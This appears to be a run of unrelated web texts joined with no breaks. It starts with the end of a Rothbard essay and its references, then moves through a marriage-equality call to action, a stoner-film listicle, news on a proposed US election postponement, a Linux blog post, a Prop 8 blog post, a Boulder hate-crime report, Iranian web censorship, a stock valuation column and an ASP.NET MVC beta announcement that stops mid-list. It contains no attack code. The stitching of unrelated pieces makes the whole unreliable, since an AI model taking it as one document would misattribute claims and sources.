. . .
Youth is the leaven that keeps all these questioning , testing attitudes fermenting in the world .
If it were not for this troublesome activity of youth , with its hatred of sophisms and glosses , its insistence on things as they are , society would die from sheer decay .
It is the policy of the older generation as it gets adjusted to the world to hide away the unpleasant things where it can , or preserve a conspiracy of silence and an elaborate pretense that they do not exist .
But meanwhile the sores go on festering just the same .
Youth is the drastic antiseptic .
. . .
It drags skeletons from closets and insists that they be explained .
No wonder the older generation fears and distrusts the younger .
Youth is the avenging Nemesis on its trail .
. . .
Our elders are always optimistic in their views of the present , pessimistic in their views of the future ; youth is pessimistic toward the present and gloriously hopeful for the future .
And it is this hope which is the lever of progress  one might say , the only lever of progress .
. . .
The secret of life is then that this fine youthful spirit shall never be lost .
Out of the turbulence of youth should come this fine precipitate  a sane , strong , aggressive spirit of daring and doing .
It must be a flexible , growing spirit , with a hospitality to new ideas and a keen insight into experience .
To keep one 's reactions warm and true is to have found the secret of perpetual youth , and perpetual youth is salvation . [ 20 ]
References :
[ 1 ] Gertrude Himmelfarb , Lord Acton ( Chicago : University of Chicago Press , 1962 ) , pp. 204–05 .
[ 2 ] Ibid. , p. 209 .
[ 3 ] Carl Becker , The Declaration of Independence ( New York : Vintage Books , 1958 ) , chap .
6 .
[ 4 ]
The information about Comte and Dunoyer , as well , indeed , as the entire analysis of the ideological spectrum , I owe to Mr. Leonard P. Liggio .
For an emphasis on the positive and dynamic aspect of the Utopian drive , much traduced in our time , see Alan Milchman , u201CThe Social and Political Philosophy of Jean - Jacques Rousseau : Utopia and Ideology , u201D The November Review ( November , 1964 ) : 3 –10 .
Also cf. Jurgen Ruhle , u201CThe Philosopher of Hope : Ernst Bloch , u201D in Leopold Labedz , ed. , Revisionism ( New York : Praeger , 1962 ) , pp. 166–78 .
[ 5 ] Joseph A. Schumpeter , Imperialism and Social Classes ( New York : Meridian Books , 1955 ) , p. 175 .
Schumpeter , incidentally , realized that , far from being an inherent stage of capitalism , modern imperialism was a throwback to the precapitalist imperialism of earlier ages , but with a minority of privileged capitalists now joined to the feudal and military castes in promoting imperialist aggression .
[ 6 ]
Bernard Semmel , Imperialism and Social Reform : English Social - Imperial Thought , 1895 – 1914 ( Cambridge , Mass. : Harvard University Press , 1960 ) .
[ 7 ]
Leopold S. Amery , My Political Life ( 1953 ) .
Quoted in Semmel , Imperialism and Social Reform , pp. 74–75 .
[ 8 ]
The point , of course , is not that these men were products of some u201CFabian conspiracy , u201D but , on the contrary , that Fabianism , by the turn of the century , was socialism so conservatized as to be closely aligned with the other dominant neo-Conservative trends in British political life .
[ 9 ]
Thus , see Horace O. Davis , u201CNations , Colonies , and Social Classes : The Position of Marx and Engels , u201D Science and Society ( Winter , 1965 ) : 26–43 .
[ 10 ]
See the penetrating article by Alexander J. Groth , u201CThe u2018Isms ' in Totalitarianism , u201D American Political Science Review ( December , 1964 ) : 888–901 .
Groth writes :
The Communists . . . have generally undertaken measures directly and indirectly uprooting existing socioeconomic elites : the landed nobility , business , large sections of the middle class and the peasantry , as well as the bureaucratic elites , the military , the civil service , the judiciary , and the diplomatic corps .
. . .
Second , in every instance of Communist seizure of power there has been a significant ideological – propagandistic commitment toward a proletarian or workers ' state . . . [ which ] has been accompanied by opportunities for upward social mobility for the economically lowest classes , in terms of education and employment , which invariably have considerably exceeded the opportunities available under previous regimes .
Finally , in every case , the Communists have attempted to change basically the character of the economic systems which fell under their say , typically from an agrarian to an industrial economy .
. . .
Fascism ( both in the German and Italian versions ) . . . was socioeconomically a counter - revolutionary movement .
. . .
It certainly did not dispossess or annihilate existent socioeconomic elites .
. . .
Quite the contrary , Fascism did not arrest the trend toward monopolistic private concentrations in business but instead augmented this tendency .
. . .
Undoubtedly , the Fascist economic system was not a free - market economy , and hence not u201 Ccapitalistu201D if one wishes to restrict the use of this term to a laissez - faire system .
But did it not operate . . . to preserve in being and maintain the material rewards of , the existing socioeconomic elites ?
[ 11 ]
For examples of the attractions of fascist and right - wing collectivist ideas and plans for American big businessmen in this era , see Murray N. Rothbard , America 's Great Depression ( Auburn , Ala. : Mises Institute , 2000 ) .
Also cf. Gaetano Salvemini and George LaPiana , What to Do With Italy ( New York : Duell , Sloan , and Pearce , 1943 ) , pp. 65 ff .
Of the fascist economy , Salvemini perceptively wrote : " In actual fact , it is the State , that is , the taxpayer who has become responsible to private enterprise .
In Fascist Italy the State pays for the blunders of private enterprise .
. . .
Profit is private and individual .
Loss is public and social . "
Gaetano Salvemini , Under the Axe of Fascism ( London : Victor Gollancz , 1936 ) , p. 416 .
[ 12 ]
Thus , see Rothbard , passim .
[ 13 ] R. Palme Dutt , Fascism and Social Revolution ( New York : International Publishers , 1934 ) , pp. 247–51 .
[ 14 ]
See Gabriel Kolko , The Triumph of Conservativm : A Reinterpretation of American History , 1900 – 1916 ( Glencoe , Ill. : The Free Press , 1963 ) , pp. 173 and passim .
For an example of the way in which Kolko has already begun to influence American historiography , see David T. Gilchrist and W. David Lewis , eds. , Economic Change in the Civil War Era ( Greenville , Del. : Eleutherian Mills–Hagley Foundation , 1965 ) , p. 115 .
Kolko's complementary and confirmatory work on railroads , Railroads and Regulation , 1877 – 1916 ( Princeton , N.J. : Princeton University Press , 1965 ) comes too late to be considered here .
A brief treatment of the monopolizing role of the ICC for the railroad industry may be found in Christopher D. Stone , u201CICC : Some Reminiscences on the Future of American Transportation , u201D New Individualist Review ( Spring , 1963 ) : pp. 3 –15 .
[ 15 ] Kolko , The Triumph of Conservatism , p. 274 .
[ 16 ]
Arthur Jerome Eddy , The New Competition : An Examination of the Conditions Underlying the Radical Change that is Taking Place in the Commercial and Industrial World 
The Change from a Competitive to a Cooperative Basis ( 7th ed. , Chicago : A.C. McClurg , 1920 ) .
[ 17 ] Kolko , The Triumph of Conservatism , p. 214 .
[ 18 ] Ibid. , pp. 286–87 .
[ 19 ]
One happy exception is William D. Grampp , u201CNew Directions in the Communist Economics , u201D Business Horizons ( Fall , 1963 ) : pp. 29 –36 .
Grampp writes :
Hayek said that centralized planning will lead to serfdom .
It follows that a decrease in the economic authority of the State should lead away from serfdom .
The Communist countries may show that to be true .
It would be a withering away of the state the Marxists have not counted on nor has it been anticipated by those who agree with Hayek . ( p. 35 )
The novel in question is Henry Hazlitt , The Great Idea ( New York : Appleton - Century - Crofts , 1951 ) .
[ 20 ] Randolph Bourne , u201CYouth , u201D The Atlantic Monthly ( April , 1912 ) ; reprinted in Lillian Schlissel , ed. , The World of Randolph Bourne ( New York : E.P. Dutton , 1965 ) , pp. 9 –11 , 15 .
The Best of Murray N. Rothbard
CALL TO ACTION : Dec 1st , please take action on this issue !
In New York it boils down to marriage equality or a continuation of denying equal rights .
Democrats now have a very slim majority in the senate which paves way for the opportunity to introduce a marriage bill which already passed the legislature , and which the governor is eager to sign into law .
The current obstacle is three socially conservative democrats who refuse to support a democratic majority leader who will put forth a same - sex marriage bill for a vote .
These three senators will possibly even cross party lines and caucus with the republicans in order to ensure it does n't happen .
It is uncertain how a vote on same - sex marriage would turn out , not all democrats support it , and not all republicans oppose it .
5 - 6 republican senators are likely to vote in favor of marriage equality .
Below are the three socially conservative democrats opposing same - sex marriage and a majority leader who will allow the bill to come to the floor for a vote :
Senator Carl Kruger
kruger@senate.state.ny.us
Office of State Senator Carl Kruger
2201 Avenue U
Brooklyn , NY 11229
Tel : ( 718 ) 743-8610
Senator Ruben Diaz
diaz@senate.state.ny.us
1733 East 172nd Street
Bronx , NY 10472
Tel : ( 718 ) 991-3161
- Sen. Pedro Espada Jr. -
No contact info found
It is imperative that we contact these senators and urge them to vote along the New York Democratic Party platform which supports same - sex marriage .
When calling please be sure to let them know as democrats it is their obligation to support Malcolm Smith for majority leader .
The fate of marriage equality very well may lie in the hands of a few socially conservative democrats trying to impose their will on the majority .
We could n't possibly endorse drugs here at Shiznit Towers , but you have to admit , the lifestyle of these five fabulous movie stoners is certainly an admirable one .
To celebrate the release of Pineapple Express this Friday , we raise a doobie to these titans of toke .
While you stress out over spreadsheets , these guys are getting nicely baked .
While you fuss over tax returns , these guys are getting nicely baked .
And while you waste away in meetings ?
These guys do n't even know what day of the week it is .
Smoke on , you lounge - loving losers .
Smoke on .
5. CHEECH AND CHONG UP IN SMOKE ( 1978 ) Cheech Marin and Tommy Chong are the original movie stoners - a more feckless pair of midnight tokers you will not find .
Their drug intake is legendary , the size of their spliffs defy the laws of physics and they even dress the part , clad in stoner gear ( bandannas , tie - dye t- shirts etc ) from top to bottom .
Harold and Who-mar ?
4. FLOYD TRUE ROMANCE ( 1993 )
We 've all had a roommate like Floyd : bong fused to his hand , ass fused to the sofa , speech degenerated into incoherent mumbling and giggling .
Yet in many ways , Floyd is the hero of Quentin Tarantino 's drug - fuelled thriller ; he dices with the Mob and survives .
Fuckin ' ... condescend him , man ...
He 'll fuckin ' ... kill you , man .
3. JAY AND SILENT BOB JAY AND SILENT BOB STRIKE BACK ( 2001 )
All you need in life is a smoke , a store to stand in front of and a song .
" Smokin ' weed , smokin ' whizz , / Doin ' coke , drinkin ' beers , / Drinkin ' beers , beers , beers , / Rollin ' fatties , smokin ' blunts , / Who smokes the blunts ? /
We smoke the blunts . "
Ladies and gentlemen , Jay and Silent Bob give you The Stoners ' Manifesto .
Hell , we 'd vote for them .
2. JEFF SPICOLI FAST TIMES AT RIDGEMONT HIGH ( 1982 ) Imagine Matthew McConaughey without the abs , and you 've just pictured Ridgemont High stoner of the year , Jeff Spicoli , a man for whom the term ' beach bum ' should be retired .
Shrouded in a fog of drug - induced idiocy at all times , it 's a wonder he dares tackle the waves , but hey - anything for a bigger high , dude .
1. JEFFREY 'THE DUDE ' LEBOWSKI THE BIG LEBOWSKI ( 1998 )
His name is Jeffrey Lebowski , but you can call him ' The Dude ' ( or ' Duder ' , or ' El Duderino ' if you 're not into the whole brevity thing ) .
The Dude is a man of simple pleasures : smoking weed , drinking White Russians and bowling .
Admit it : if you could , you 'd slip right into your dressing gown , burn one out and slip on some Creedence .
Heaven .
Pineapple Express is released in the UK on Friday .
Ali
Security is a major issue in the upcoming US elections
US counter - terrorism officials are examining what steps would be needed to permit a delay , Newsweek reports .
Homeland Security chief Tom Ridge last week warned al - Qaeda was planning to attack the US to disrupt the poll but conceded he had no precise information .
A senior Democrat in Congress has said talk of postponement is " excessive " .
Doomsday scenarios
In its latest edition , Newsweek reports that Mr Ridge has asked the Justice Department to examine what legal steps would be needed to permit the postponement of the 2 November election .
This follows a letter from the chairman of the new Election Assistance Commission , DeForest Soaries , who urged Mr Ridge to seek emergency legislation from Congress that would allow his agency to reschedule the vote in the event of an attack .
If they do this , boy , my God , they 're extremely desperate
Ciro Rodriguez
Democrat Congressman
Homeland Security Department spokesman Brian Roehrkasse told Newsweek , " We are reviewing the issue to determine what steps need to be taken to secure the election . "
Republican Representative Christopher Cox , who chairs the House Homeland Security Committee , told CNN that it was prudent to prepare for a postponement .
" These are doomsday scenarios .
We do n't have any intelligence to suggest that it is going to happen , but we 're preparing for all of these contingencies now . "
Old information
But Jane Harman , the senior Democrat on the House of Representatives Intelligence Committee , said proposing a postponement would be " excessive based on what we know " .
She also criticised Mr Ridge 's suggestion that al - Qaeda was planning to disrupt the election , saying the warning was based on old information .
The BBC's Justin Webb in Washington says the Democrats ' unspoken fear is that the White House will play on the nerves of Americans as the election nears , hoping to gain support from a nation fearful of any change in course .
It is a difficult strategy for the Democrats to counter .
If they appeared complacent and terrorists did strike , they would be politically destroyed , he says .
No US presidential election has ever been postponed .
Abraham Lincoln was urged by some aides to suspend the election of 1864 - during the US Civil War - but despite the expectation that he would lose , he refused .
" The election is a necessity , " Lincoln said .
" We cannot have a free government without elections ; and if the rebellion could force us to forgo , or postpone , a national election , it might fairly claim to have already conquered us . "
Submitted by srlinuxx on Monday 6th of October 2008 10:50:19 AM
Filed under
By Lisa Miller
I was a techno - dinosaur , resisting the call of the computer with all my might .
At the time , the learning curve seemed too steep and there was always too much to do .
Finally it occurred to me that in a few short years it was possible that one could n't survive without basic computer skills ; even then very young children were being exposed to computing .
Being 46 years old with a family history of living a long productive life would mean that many years of that life would effectively be ' out of the loop ' .
Finally on January 1 , 2004
I took the plunge , bought a computer with Microsoft XP and taught myself how to use it .
Not coincidentally , I stopped watching television at the same time and am a much happier person because of it .
Starting out with Windows XP was a fortunate coincidence .
It 's a fairly newbie - friendly OS .
Vista is reviled by experts and scorned even by schoolkids .
My 11 - year - old nephew snorts about the ' crapware ' packaged with Vista on his new laptop and whines about how slowly it runs compared to the older , refurbished PCLinuxOS machine his grandmother ( my mother ) is using .
I became relatively proficient in PaintShop Pro 8 ; the only time I use the Windows box is to use PSP8 .
If it were successfully ported to a Linux distro , I 'd only keep the Windows box for reference , to help my friends who have questions or need assistance .
Since then , Don has become interested in building computers and spent all his leisure time ( ?! ) taking donated and inexpensive old hardware and installing Linux distros on them and gives them to students or seniors who want them .
He installs the most user - friendly distro that suits the machine and we offer free tutoring to get the recipients up to speed .
I played with several live CDs and PCLinuxOS quickly became my favorite .
There is an icon for IRC on the desktop .
Just after the install ( at 2:30 am ) we had a question , asked for and got an answer immediately .
I 've never looked back .
The desktop is clean , beautiful , functional and powerful .
My HP printer and Vivitar camera were both simply Plug and Play .
Since then I 've evaluated a lot of Linux Distros and have had fun doing it , but PCLinuxOS is my distro .
I 'm currently using the 2007 release .
It was built for the home user and in my opinion has no equal in that regard .
I have no interest in looking at the innards of a computer and fixing it .
I need a machine that will just do the jobs I need to do and be fairly difficult to break .
I need to :
Email :
Kontact is a simple , easy - to use PIM , the first I had been exposed to , and a delight to learn and use .
In its own words , ' Kontact is the integrated solution to your personal information management ( PIM ) needs .
It combines well - known KDE applications like KMail , KOrganizer and KAddressBook into a single interface to provide easy access to mail , scheduling , address book and other PIM functionality . '
You can use the system or any discrete part of it , choosing the features you need .
Surf the Web :
Preparatory to switching to Linux I downloaded and used Firefox for a few weeks .
Most of what I do on a daily basis is surfing the web for links for our ezine and Googling for information on subjects that interest me .
The switch to Linux was seamless .
Recently a young lady who had been offline for several weeks used my computer to check her and her friends '
MySpace pages .
She was familiar with Firefox , accomplished what she needed to and said thanks .
I asked , " You did know you 've been using a Linux OS for the last half - hour ? "
She smiled and turned back to the monitor while I explained and demonstrated the concept of " free software " .
The kid is ours .
Process Photos :
I take a lot of photos ; all the photography for our site and the websites I 've built and maintain and the photos for our ebay auctions .
Until recently I used PSP 8 for everything , and still do for images that require high quality results or artistic manipulation , but am now using ShowFoto , the image - editing engine of DigiKam .
Practice with this tool has made processing photos fast and easy .
Time constraints have kept me from investing much in the GIMP , but never fear , I 'll get there .
Teach :
My mother is in her late 70's and had no experience whatsoever with computers .
We set her up with a system loaded with PCLinuxOS and Skype sent it to Florida .
With coaching over the phone she set it up herself and was getting her first computer lesson , via Skype , in a little over an hour .
The details are here in Lockergnome Nexus ;
http://www.lockergnome.com/dirtgoddess/2008/01/30/like-a-virgin/
Nothing in the world is as satisfying as teaching .
She now surfs the web by herself , plays games , writes emails , has downloaded free software and even advertised a rummage sale on Craiglist .
We talk on Skype twice a week and have never been closer since I left home rather a long time ago .
Updates :
It is difficult to explain how different the Linux Update process is from the Windows experience .
I 'm very ... particular , I would say .
Don would use another phrase .
When you update Linux , they are actually updates - as in improvements - in the OS and all of the software installed on your machine , not continuous desperate efforts to plug security holes in an inherently defective system .
Every single time I did a Windows Update I spent the next 3 days grousing that mysteriously , many of my settings had changed ; the computer acted clunky and alien and my firewall , ZoneAlarm , insisted that Microsoft was trying to ' phone home ' .
For what , might I ask ?
Free Software :
With very few exceptions , there are analogs to any software you can buy for absolutely no cost .
Free - as in costless and free - to use as you please .
Far too many people believe costless means worthless .
Those of us with the Open Source mentality must go forth and proselytize .
Documentation :
I like to read manuals and learn very well from them .
Every application in Linux has a Handbook or man page .
Give me the book and go away for awhile .
I love this !
FUD Antidote :
The genius of the Live CD is not to be underestimated .
The average computer user has a mysterious , very expensive machine that they 're afraid to break .
They 've been browbeaten into Fear , Uncertainty and Doubt .
As the so - called Ignorant Consumer , they are at the mercy of proprietary operating systems and merchants of bloated software .
Despite their best efforts to keep their machines clean and lean , their systems gradually slow to a crawl while they dread taking it to an expensive repair shop .
They are not about to do something so drastic as change operating systems unless there is a very good reason to do so .
A Live CD with which they can see how well their computer will function without harming it is wonderfully empowering .
The average user can see how well Linux works and make an informed decision about hitting the Install button .
When a user is using a new operating system they come to realize it's a tool and real people use many tools .
Being OS - centric is self - defeating : why deprive yourself of choices ?
I recently was given an Apple Mac with OS X - Jaguar edition .
No longer being afraid of new ' different ' operating systems allowed me to enjoy myself , tool around , begin to get a feel for the OS and surf for tutorials on the web .
Linux has spoiled me , though .
I keep wondering " Where 's all the free software ? " .
It 's all about choices .
I believe Linux does it best .
One of the biggest opponents of gay marriage in California is the Mormon church .
They are one of the players in the money behind Prop 8 .
Seems they are now catching some blow back from within their own ranks as well as bloggers .
From the San Francisco Chronicle :
The church largely stays out of politics .
But in this case , the Salt Lake City - based church has sent letters , held video conferences and in church meetings asked for volunteers to support the campaign .
In response , some church members have poured in their savings and undertaken what may be an unprecedented grassroots mobilization for the effort .
Prop. 8 is on pace to be the costliest race in the nation , except for the billion - dollar presidential election .
The Yes on 8 campaign estimates that up to 40 percent of its donations come from Mormons .
Some others estimate that Mormons account for over 70 percent of donations from individuals .
Seems like the Mormon Church wants to manipulate the political process for their own ideology .
Well , sometimes , people fight fire with fire .
Prop. 8 opponents are increasingly narrowing their focus on Mormons , harnessing technology and open - records laws in their efforts .
One Web site run by a Prop. 8 opponent , Mormonsfor8.com , identifies the name and hometown of every Mormon donor .
On the Daily Kos , the nation ’s most popular liberal blog , there is a campaign to use that information to look into the lives of Mormons who financially support Prop .
8 .
Sunshine is a great thing and it teaches lessons .
One pro-Prop 8 supporter seems to have learned a lesson :
Those words speak for Michele Sundstrom , 47 , of San Jose , who has been married for 18 years and has five children .
She and her husband gave $ 30,000 to the Yes on 8 campaign and put a sign on their home .
But in response , two women parked an SUV in front of their home , with the words “ Bigots live here ” painted on the windshield .
Sundstrom believes such responses must come from deep places of pain – and that gays and lesbians are entitled to the same rights as heterosexuals , just not the word marriage .
Any animosity toward gays or lesbians is wrong , she said .
“ There must be such deep , deep , deep hurt ; otherwise there could n’t be so much opposition , ” she said .
“ They ’ve lived with this .
I guess we ’re getting a taste of where they live . ”
Yup , I guess you are .
Is it really worth a word ?
Maybe Mormons should be more worried about Mormon Warren Jeffs and his definition of marriage rather than whether Warren marries Jeff .
There are plenty of ways to help the No on Prop 8 campaign – help here .
And you can donate here :
Today ’s inspiration comes from LSD s.r.l. , a great Italian photography and image manipulation studio .
The quality of the images they produce is exceptional and everyone in the design community should be familiar with their work .
A 22 - year - old Asian - American was repeatedly punched in the face early today in Boulder and forced to say “ I love America , ” Boulder police reported .
That attack and a reported sexual assault led to condemnations from both university and city officials .
The Asian - American victim told investigators that he was walking in the area of 10th and Marine streets with friends about 1 a.m. , singing a song from the movie “ Team America . ”
He said they were confronted by four men .
One of the men — described as being a blond white male about 19 or 20 — said , “ Do you think you are an American ? ” called him a “ Chinaman , ” punched him in the face “ multiple times ” and told him to say that he loved America , police said .
In an unrelated incident , police reported that a 20 - year - old woman , a student at a community college , was walking to her Boulder home following a party about 12:45 a.m. today when she was attacked by four men .
She told investigators that while two of the men held her down , the two others sexually assaulted her .
CU - Boulder chancellor G.P. “ Bud ” Peterson said that the Asian - American victim was a recent CU graduate and that his three companions are current CU students .
Peterson said that attack , coupled with the “ horrific sexual assault ” on the Boulder woman , “ offend the sensibilities and values of our entire campus community .
“ Such violence , whether perpetrated against women or against people because of their ethnicity , has no place in any community but particularly damages a community of learning , ” said Peterson .
After the confrontation with the Asian - American , the assailant ran off with three other members of his group .
The suspect is about 5 - foot - 10 and was wearing a white tank top and black pants .
One of the other men with the assailant in what officials said may be a hate crime was described as a white male with a long goatee and was wearing a long - sleeved gray sweatshirt .
Sarah Huntley , spokeswoman for the Boulder Police Department , said that originally investigators believed a knife was held to the Asian - American ’s throat .
But she said further interviews lead investigators to believe that the suspect may have referred to a knife but did not show one .
CU vice chancellor for student affairs Julie Wong said any attack on a member of the “ CU family or against any person in the community , whether affiliated with CU or not , is an attack against all of us collectively . ”
“ This hate crime underscores the importance of our message of inclusion , diversity and acceptance , ” said Wong .
Boulder City Manager Jane Brautigam said that she , along with Boulder Police Chief Mark Beckner and his staff , are asking Boulder residents to “ make safety a number one priority this Halloween weekend .
“ The city defends the rights of all residents and condemns all acts of violence and crime , ” said Brautigam .
“ As stewards of public safety , we will continue in our many efforts to prevent such offensive acts from occurring in our city . ”
The woman who was sexually assaulted told police that after the assault she ran home .
Friends found her crying on her front porch about 1:40 a.m..
The victim was taken to St. Anthony ’s North Hospital , where she underwent a sexual assault examination .
According to Huntley , the sex - assault victim said the four suspects had darker skin and may have been Hispanic .
The victim said all had dark , “ slick back ” hair and appeared to be in their 20s .
One of the assailants had a beard .
Anyone with information about the attack on the Asian - American is asked to contact Detective Kristi Peterson at 303-441-3330 .
Anyone with information about the sexual assault is asked to contact Detective Colleen Wilcox at 303-441-3330 .
Those with information about either case who wish to remain anonymous should contact Bounty County Crime Stoppers at 800-222-8477 or submit a tip via the Crime Stoppers website at crimeshurt.com /.
Howard Pankratz : 303-954-1939 or hpankratz@denverpost.com
Five million internet websites are currently being blocked by the Iranian government , a progressive site called ' Rooz ' reported Wednesday , quoting the Islamic Republic 's prosecutor general as its source .
The report added that a few million additional sites were being censored as a " preemptive measure " by the regime .
The report is the first ever in which a legislative source from Iran has divulged information about the regime 's censorship policies .
Blogger or Spy ? Report : Iranian blogger who visited Israel arrested in Tehran Dudi Cohen Iranian website says famous blogger Hossein Derakhshan , who visited Israel twice in recent years , detained in Tehran shortly after returning to country from Canada .
Site claims blogger admitted to spying for Israel Report : Iranian blogger who visited Israel arrested in Tehran
Ismail Radkani , a spokesman for the company responsible for the blocking of websites in Iran , also spoke during the conference .
He said over a thousand such sites were being " automatically " withdrawn from the public eye every month , according to legislature passed down from the government .
" Every day 200- 300 unethical sites are being automatically blocked , " he said .
Iran 's population currently stands at 71 million , and the number of web - surfers , currently estimated at about 20 million , is steadily rising .
The Islamic Republic ranks second only to Israel in its percentage of web - surfers of any country the Middle East .
Most of the internet - savvy Iranians have devised methods of circumventing the censorship imposed upon them , and make use of different proxies and alternate addresses when publishing their online blogs .
But the Iranian government has insisted on battling the " westernization " of its younger population , and the internet is considered a major culprit in this scheme .
Abadi estimated the internet as a more imminent danger than satellite dishes , " because of the fact that the internet is more accessible " .
Thus , he called for the establishment of an " internet police " in his country .
Distorting Khameini's words illegal
Two years ago President Mahmoud Ahmadinejad 's government approved an " internet and blog registration plan " , which ordered that every site and blog originating in the country seek an approval stamp from a nominated committee .
However many bloggers decided to boycott the plan , and only 850 sites and blogs have registered .
Bloggers and sites that place " unethical content " online are subject to penalties by law .
A website is deemed illegal if it contains content " weakening Islamic values , insulting the Islam and its martyrs , inciting harm to security and the interests of the Islamic Republic , or distorting the words of ( Ali ) Khamenei " among other things .
In February of 2008 the Iranian parliament approved part of another bill against " computer crimes " , which has caused a great uprising among web - surfers because of the severe sentences it would impose , ranging from jail time to execution .
ANNANDALE , Va. ( MarketWatch ) -- I felt really old on Thursday .
The guest before me on a television talk show expressed astonishment that price / earnings ratios were so low currently .
In fact , he pointed out incredulously , some stocks '
P/ Es had dropped so low that they were now even in the unheard of single digits .
To me , this just showed how little stock market history that this guest really knew .
In fact , according to data collected by Yale University Prof.
Robert Shiller , the stock market 's P/E ratio has been below 10 in 17 % of the months since 1871 .
That 's about one - sixth of the time .
Of course , most of those months came more than two decades ago .
That 's why those with short memories can get away with thinking that current P/E ratios are particularly low .
The last time the market 's P/E was below 10 , for example , according to Shiller 's data , was in 1984 , some 24 years ago .
Anyone younger than 45 or 46 was probably still in college at that time .
I was prompted by this talk show guest 's incredulity to see how the stock market 's current P/E ratio stacks up to long - term historical norms .
I emerged from my analysis with incredulity , but of just the opposite variety : I was amazed at how high the stock market 's current valuation is , even after the market 's plunge over the past month .
Any analysis of stock market valuation has to carefully choose which definition of earnings to use when calculating P/E ratios .
One can focus on operating earnings , as - reported earnings , and core earnings , for example .
And then one can focus on these earnings over the trailing year , or as analysts are forecasting for the coming 12 months .
To be comparable with Shiller 's database , I focused on as - reported earnings per share over the trailing 12 months .
On this basis , the current PE ratio for the S&P 500 index SPX , - 0.48 % is 18.1 .
Only 21 % of the months since 1871 have had higher PE ratios than this , it turns out .
You read that right :
Even after a year - long bear market , and especially even after the market 's rout over the last month , the stock market 's current valuation is still more expensive than 79 % of the months over the last 138 years .
How , then , can anyone even think that the market 's current P/E ratio is low ?
One way they can do so is by focusing on projected earnings over the coming year .
But analysts are perennially optimistic , and any P/E ratios based on their projections are risky .
To be sure , P/E ratios sometimes are artificially high at the end of bear markets , when earnings are depressed .
But I do n't think that we can use this possibility to explain away the market 's apparently high valuation right now .
Consider , for example , a modified P/E ratio that Shiller calculates ; one of its virtues is that it overcomes the problems associated with artificially depressed earnings at bear market lows .
The denominator of this modified ratio is average inflation - adjusted earnings over the trailing 10 years .
Call this modified ratio " P/E10 . "
According to Shiller 's data , the market 's current P/E10 is higher than 80 % of comparable readings over the past 130 years .
What does all this mean ?
For starters , it means that the stock market 's current valuation is not abnormally low right now , much less even below average .
If you have been basing your bullishness on the belief that it is particularly low , then you need to rethink your bullishness .
Secondly , this analysis suggests that any stock market low that happens at or close to current levels would be the springboard for only a so - called cyclical bull market , not a secular one .
Secular bull markets occur no more often than once a generation .
At the beginning of the bull market in August 1982 , for example , the market 's P/E ratio was below 8 .
Now that 's a secular bull - market valuation , and over the subsequent 20 years the stock market went up more than tenfold .
At the beginning of the bull market in October 2002 , in contrast , the market 's P/E ratio was 29.1 , according to Shiller 's data .
That only could support a so - called cyclical bull market , and the ensuing bull market did n't even quite produce a double .
Today we released a beta of the new ASP .
NET MVC framework .
Click here to download it .
You can also visit www.asp.net/mvc to explore tutorials , quickstarts , and videos to learn more .
The ASP.
NET MVC Beta works with both .
NET 3.5 and .NET 3.5 SP1 , and supports both VS 2008 and Visual Web Developer 2008 Express SP1 ( which is free - and now supports class libraries and web application project types ) .
Today's ASP.
NET MVC Beta release comes with an explicit " go - live " license that allows you to deploy it in production environments .
The previous preview releases also allowed go - live deployments , but did so by not denying permission to deploy as opposed to explicitly granting it ( which was a common source of confusion ) .
Today 's release is clearer about this in the license .
The beta release is getting close to V1 feature complete , although there are still a few more features that will be added before the final " V1 " release ( including several VS tooling enhancements ) .
The team decided to call this release a " beta " , though , because the quality and testing of it is higher than the previous previews ( a lot of bug fixes and performance tuning work went into it ) , and they feel that the core features that are in it are now " baked enough " that there wo n't be major changes from this release to the final product .
This post contains a quick summary of some of the new features and changes in this build compared to the previous " Preview 5 " release :
I am also planning to publish a few end to end tutorials in the weeks ahead that explain ASP .
NET MVC concepts in more depth for folks who have not looked at it before , and who want a " from the beginning " set of tutorials on how to get started .
New " Add View " Menu in Visual Studio
With previous ASP .
NET MVC preview releases you had to manually add views through the Project -> Add New Item dialog in VS , and creating and wiring up everything required several manual steps ( making sure the directory / file structure is right , going into the code - behind file to specify the strongly typed ViewData model type , etc ) .
Today 's beta makes the steps much easier .
You can now just move your source editor cursor to be within a Controller action method in the source editor , and then right - click and select a new " Add View " context menu item ( alternatively you can type the Ctrl - M Ctrl - V keyboard shortcut to invoke this without having to take your hands off the keyboard ) :
This will bring up a new " Add View " dialog that allows you to specify the name of the view you want to create , its master page , and optionally its strongly typed ViewData " Model " type :
Visual Studio will automatically pre-populate the view name based on the action method your cursor is within ( you can then override this if you want ) .
For example , if our cursor had been within an " Edit " action method when we selected " add view " it would have pre-populated the view name textbox with " Edit " instead of " Browse " .
The strongly typed ViewData " model " for a view can be selected from an editable ComboBox that lists all classes in ( or referenced ) from the MVC project :
You can either select a type from the list , or manually type one in the ComboBox .
You can also optionally pick an initial type from the list and then tweak it .
For example , we could select the " Product " class from the list and then use the ComboBox editing support to wrap it as an IEnumerable < Product > - meaning a sequence of products :
When we click the " Add " button , Visual Studio will automatically create the appropriate view directory structure , and add a strongly typed view with the right name and base class to our project .
For example , if I followed the steps above it would create a new \ Views \Products directory for me ( since my controller class name is " ProductsController " ) and add the strongly - typed " Browse.aspx " view to it ( which derives from ViewPage < IEnumerable < Product >> - since that was the model type we indicated in the dialog above ) :
The newly created view will automatically be opened for us in the IDE .
We can then implement our view with full intellisense ( tip : make sure to do a build immediately after creating the view to ensure that intellisense shows up for your strongly typed model ) :
And at runtime we will now have an SEO optimized product browsing page built with ASP .
NET MVC :
Note :
The view file created by Add - View with this beta release is empty .
For the final release we are hoping to add some " scaffolding " features to the Add - View dialog that will allow you to optionally specify that you want to automatically create an HTML list / details view or edit / insert form based on the strongly - typed model specified in the add - view dialog ( you can then start with this initial html view and tweak it however you want ) .
In the future we will also integrate ASP .
NET Dynamic Data with MVC to support even richer scaffolding options .
New \ Scripts directory and jQuery Support
The project template that ships with today 's release now adds a new \ Scripts directory underneath the project root .
This is now the recommended place to store JavaScript files in your application .
The ASP.
NET MVC Beta now adds both ASP .
NET AJAX and jQuery libraries to this folder :
The jQuery files are the standard jQuery libraries , and are licensed under the MIT source license ( read my previous jQuery and Microsoft post for details ) .
With the SP1 updates of VS 2008 or Visual Web Developer 2008 Express , you will get basic JavaScript intellisense when using the above jQuery files .
We will be shipping a jQuery intellisense - annotation file in a few more weeks that provides much better and more complete jQuery intellisense support ( including the ability to get intellisense when using multiple chained selectors / commands ) .
This will be included built - in with the next ASP .
NET MVC update .
Form Post and Model Binder Improvements
One of the biggest areas of feature investment with the ASP.
NET MVC " Preview 5 " release was the work around form post scenarios .
I did an in - depth blog post about these form post scenario features last month .
Today 's beta includes a number of additional tweaks , enhancements , and refinements in this area .
These include :
